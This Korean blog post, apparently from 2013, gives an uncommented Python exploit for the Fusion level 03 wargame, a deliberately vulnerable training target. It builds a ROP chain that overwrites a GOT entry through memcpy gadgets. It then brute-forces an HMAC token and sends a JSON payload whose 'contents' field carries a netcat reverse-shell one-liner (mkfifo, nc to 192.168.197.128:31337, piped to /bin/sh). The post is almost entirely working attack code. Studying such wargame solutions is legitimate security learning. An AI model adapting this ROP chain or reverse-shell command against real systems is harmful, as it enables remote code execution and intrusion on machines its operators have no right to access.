본문 바로가기
Computer Security/WarGame

[exploit-exercises] Fusion level 03

tunz 2013. 7. 11. 23:23 





from socket import *
from struct import *
import hmac
from hashlib import sha1
 
# contents: 0x804bdf4
# 0804: 0x8048584+7
# 8f: 804bda4+1
# 30: 80482a4
 
rand_plt = 0x08048f30
rand_got = 0x804bd98
memcpy = 0x8048e60
gContents = 0x804bdf4
ppppr = 0x804a26c
 
pop_ebx = 0x8049402 # pop ebx ; pop ebp ;;
pop_eax =  0x8049b4f # pop eax ; add esp 0x5c ;;
add_eax_ebx = 0x80493f9 # add eax 0x804bde4 ; add [ebx+0x5d5b04c4] eax ;;
leave_ret = 0x8049431 # leave;;
 
s = socket(AF_INET, SOCK_STREAM)
s.connect(('192.168.197.130',20003))
 
raw_input('go?')
get=s.recv(1024).rstrip()
token = get[1:len(get)-1]
print token
 
cmd = "id\x00"
 
payload = ""
payload += pack('<L',pop_ebx)
payload += pack('<L',(rand_got - 0x5d5b04c4)&0xFFFFFFFF) # ebx
payload += "AAAA" # ebp
 
payload += pack('<L',pop_eax)
payload += pack('<L',0xf7fbd6cc)
payload += "A"*(0x5c)
 
payload += pack('<L',add_eax_ebx) # eax = 0x94b0
 
payload += pack('<L',memcpy)
payload += pack('<L',ppppr+1)
payload += pack('<L',gContents-5)
payload += pack('<L',0x8048584+7)
payload += "\\\\u0100\\\\u0000"
payload += pack('<L',memcpy)
payload += pack('<L',ppppr+1)
payload += pack('<L',gContents-6)
payload += pack('<L',0x8048584+8)
payload += "\\\\u0100\\\\u0000"
payload += pack('<L',memcpy)
payload += pack('<L',ppppr+1)
payload += pack('<L',gContents-7)
payload += pack('<L',0x804bbb4+1)
payload += "\\\\u0100\\\\u0000"
payload += pack('<L',memcpy)
payload += pack('<L',ppppr+1)
payload += pack('<L',gContents-8)
payload += pack('<L',0x80482a4)
payload += "\\\\u0100\\\\u0000"
 
payload += pack('<L',ppppr+3)
payload += pack('<L', gContents-12) # ebp
 
payload += pack('<L',leave_ret)
 
lists =  range(ord('a'),ord('z')+1)+range(ord('A'),ord('Z')+1)+range(ord('0'),ord('9')+1)
 
breakall=0
 
for i in lists:
 for j in lists:
  for k in lists:
   for l in lists:
        trys = chr(i)+chr(j)+chr(k)+chr(l)
        print trys
        json = '{"contents":"mkfifo /tmp/tunz; nc 192.168.197.128 31337 0< /tmp/tunz | /bin/sh 1> /tmp/tunz;", "title":"'+trys+"A"*123+"\\\\u0030"+"A"*31+payload+'", "serverip":"192.168.197.128:31337"}'
        checksum = hmac.new(token,token+"\n"+json,sha1).hexdigest()
        print checksum
        if checksum[0:4] == "0000":
                breakall=1
                break
   if breakall==1:
        break
  if breakall==1:
        break
 if breakall==1:
        break
 
print "Send: "+token+"\n"+json
print checksum
 
s.send(token+"\n"+json)
s.close()


저작자표시 비영리 변경금지

'Computer Security > WarGame' 카테고리의 다른 글

[exploit-exercises] Fusion level 04  (0) 2013.07.12
[exploit-exercises] Fusion level 02  (0) 2013.07.09
[exploit-exercises] Fusion level 01  (0) 2013.05.31
[exploit-exercises] Fusion level 00  (3) 2013.05.31
[exploit-exercises] ssh setting  (0) 2013.05.31

'Computer Security/WarGame' Related Articles

티스토리툴바